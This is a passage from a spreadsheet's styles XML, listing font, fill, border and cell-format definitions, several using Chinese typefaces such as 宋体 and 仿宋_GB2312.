    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFFA7D00"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF800080"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFFFFFFF"/>
      <name val="宋体"/>
      <charset val="0"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10.5"/>
      <color rgb="FF000000"/>
      <name val="仿宋_GB2312"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Times New Roman"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="24"/>
      <name val="方正小标宋简体"/>
      <charset val="134"/>
    </font>
  </fonts>
  <fills count="41">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3"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="44"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="0"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFC000"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF92D050"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFF0000"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="8"/>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rgb="FFFFC7CE"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="4" tint="0.599993896298105"/>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FFEB9C"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFCC99"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFFCC"/>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theme="4"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF2F2F2"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="9" tint="0.799981688894314"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFC6EFCE"/>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6"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFA5A5A5"/>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8" tint="0.399975585192419"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="2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top/>
      <bottom style="thin">
        <color auto="1"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right/>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color auto="1"/>
      </right>
      <top/>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right/>
      <top style="thin">
        <color auto="1"/>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right style="thin">
        <color auto="1"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom/>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color indexed="8"/>
      </right>
      <top style="thin">
        <color auto="1"/>
      </top>
      <bottom style="thin">
        <color indexed="8"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left style="thin">
        <color auto="1"/>
      </left>
      <right style="thin">
        <color indexed="8"/>
      </right>
      <top/>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102">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="42" fontId="8" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="110" fillId="24" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="118" fillId="22" borderId="20" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="44" fontId="8" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="41" fontId="8" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="110" fillId="18" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="111" fillId="16" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="43" fontId="33" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="109" fillId="31" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="124" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="9" fontId="8" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="126" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="23" borderId="21" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="109" fillId="33" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="113" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="114" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="122" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="112" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="9" fontId="33" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="116" fillId="0" borderId="19" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="120" fillId="0" borderId="19" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="109" fillId="30" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="113" fillId="0" borderId="24" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="109" fillId="37" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="121" fillId="27" borderId="23" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="125" fillId="27" borderId="20" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="127" fillId="35" borderId="25" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="119" fillId="0" borderId="22" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="110" fillId="28" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="109" fillId="15" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="115" fillId="0" borderId="18" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="64" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="123" fillId="29" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="117" fillId="21" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="110" fillId="36" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="109" fillId="26" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="110" fillId="32" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="110" fillId="17" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="110" fillId="20" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="110" fillId="25" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="109" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="109" fillId="14" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="110" fillId="19" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="110" fillId="11" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="109" fillId="10" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="41" fontId="33" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="110" fillId="39" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="109" fillId="40" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="109" fillId="13" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="110" fillId="12" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="109" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="42" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>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xf numFmtId="0" fontId="33" fillId="0" borderId="0"/>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alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0"/>
    <xf numFmtId="43" fontId="9" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="41" fontId="33" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="1193">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="2" fillId="4" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="3" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="2" fillId="4" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="2" fillId="4" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="2" fillId="5" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="6" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="7" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="2" fillId="5" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="2" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="7" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="8" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="9" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="2" fillId="5" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1"/>
    <xf numFmtId="4" fontId="2" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="4" fontId="2" fillId="3" borderId="5" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1"/>
    <xf numFmtId="4" fontId="2" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="2" fillId="5" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="3" fillId="3" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="3" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="4" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="2" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="2" fillId="3" borderId="11" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="6" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="7" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="2" fillId="7" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="7" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="8" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="2" fillId="8" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="8" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="5" fillId="5" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="3" fontId="2" fillId="9" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
